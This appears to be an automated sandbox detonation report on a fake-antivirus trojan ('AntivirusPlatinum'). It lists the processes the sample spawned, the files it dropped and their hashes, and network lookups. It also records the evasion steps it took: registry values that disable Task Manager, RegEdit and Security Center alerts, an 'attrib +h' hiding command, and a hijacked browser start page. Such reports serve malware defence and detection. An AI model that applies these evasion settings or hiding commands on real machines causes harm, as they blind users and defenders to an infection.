PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2416 wrote to memory of 1948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" \??\c:\windows\antivirus-platinum.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\5AFC.tmp\302746537.bat" "

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

\??\c:\windows\antivirus-platinum.exe

c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h c:\windows\antivirus-platinum.exe

Network

N/A

Files

memory/2492-10-0x0000000001D90000-0x0000000001D96000-memory.dmp

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
SHA1 3dbb8f7f5dfe6b235486ab867a2844b1c2143733
SHA256 3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035
SHA512 d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

memory/2492-14-0x00000000031C0000-0x00000000031D0000-memory.dmp

memory/2616-17-0x0000000000400000-0x0000000000410000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AFC.tmp\302746537.bat

MD5 7d8beb22dfcfacbbc2609f88a41c1458
SHA1 52ec2b10489736b963d39a9f84b66bafbf15685f
SHA256 4aa9ed4b38514f117e6e4f326cb0a1be7f7b96199e21305e2bd6dce289d7baa2
SHA512 a26cf9168cf7450435a9fe8942445511f6fda1087db52bd73e335d6f5b544fc892999019d9291d9dcc60c3656de49688f6d63282c97706e2db286f988e44fd94

\??\c:\windows\comctl32.ocx

MD5 821511549e2aaf29889c7b812674d59b
SHA1 3b2fd80f634a3d62277e0508bedca9aae0c5a0d6
SHA256 f59cdf89f0f522ce3662e09fa847bca9b277b006c415dcc0029b416c347db9c4
SHA512 8b2e805b916e5fbfcccb0f4189372aea006789b3847b51018075187135e9b5db9098f704c1932623f356db0ee327e1539a9bf3729947e92844a26db46555e8cd

\??\c:\windows\mscomctl.ocx

MD5 714cf24fc19a20ae0dc701b48ded2cf6
SHA1 d904d2fa7639c38ffb6e69f1ef779ca1001b8c18
SHA256 09f126e65d90026c3f659ff41b1287671b8cc1aa16240fc75dae91079a6b9712
SHA512 d375fd9b509e58c43355263753634368fa711f02a2235f31f7fa420d1ff77504d9a29bb70ae31c87671d50bd75d6b459379a1550907fbe5c37c60da835c60bc1

\??\c:\windows\antivirus-platinum.exe

MD5 cd1800322ccfc425014a8394b01a4b3d
SHA1 171073975effde1c712dfd86309457fd457aed33
SHA256 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0
SHA512 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

memory/2416-38-0x0000000000130000-0x000000000013D000-memory.dmp

memory/2416-37-0x0000000000130000-0x000000000013D000-memory.dmp

memory/2468-39-0x0000000000400000-0x000000000040D000-memory.dmp

memory/2616-42-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2468-43-0x0000000000400000-0x000000000040D000-memory.dmp

memory/2492-44-0x00000000031C0000-0x00000000031D0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

Signatures

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" \??\c:\windows\antivirus-platinum.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\WINDOWS\302746537.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\windows\antivirus-platinum.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_240658765 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE7-8583-11D1-B16A-00C0F0283628}\ = "IButtons" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94444-E5E8-101B-B9B5-444553540000}\InprocServer32\ = "c:\\windows\\comctl32.ocx" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\ = "IListItems" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8B0-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE37-8596-11D1-B16A-00C0F0283628}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A3-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8556BCD2-E01E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\ = "IPanels" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{35053A21-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE5-8583-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{612A8625-0FB3-11CE-8747-524153480004} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BF877892-E026-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\ = "Microsoft TabStrip Control 6.0 (SP4)" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\ToolboxBitmap32\ = "c:\\windows\\mscomctl.ocx, 10" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B5-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F050-858B-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA662-8594-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7}\ = "IPanel10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8D1-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83600-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\ = "ISlider" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ = "IListView" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94441-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE32-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74190B7-8589-11D1-B16A-00C0F0283628}\ = "INodes" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\ = "IListSubItems" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F4-EB8B-11CD-8820-08002B2F4F5A} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA42-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B7E6390-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TreeCtrl\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F051-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Slider\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\MiscStatus\1\ = "131473" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE34-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ProgCtrl\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA50-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA42-E020-11CF-8E74-00A0C90F26F8}\ = "IButton" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Control C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F051-858B-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1972 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 1972 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 1972 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 4904 wrote to memory of 2408 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 4904 wrote to memory of 2408 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 4904 wrote to memory of 2408 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2408 wrote to memory of 3684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 3684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 3684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2408 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2408 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2408 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\antivirus-platinum.exe
PID 2408 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2408 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2408 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" \??\c:\windows\antivirus-platinum.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\30FE.tmp\302746537.bat" "

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\comctl32.ocx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s c:\windows\mscomctl.ocx

\??\c:\windows\antivirus-platinum.exe

c:\windows\antivirus-platinum.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h c:\windows\antivirus-platinum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 8.192.122.92.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Windows\302746537.exe

MD5 8703ff2e53c6fd3bc91294ef9204baca
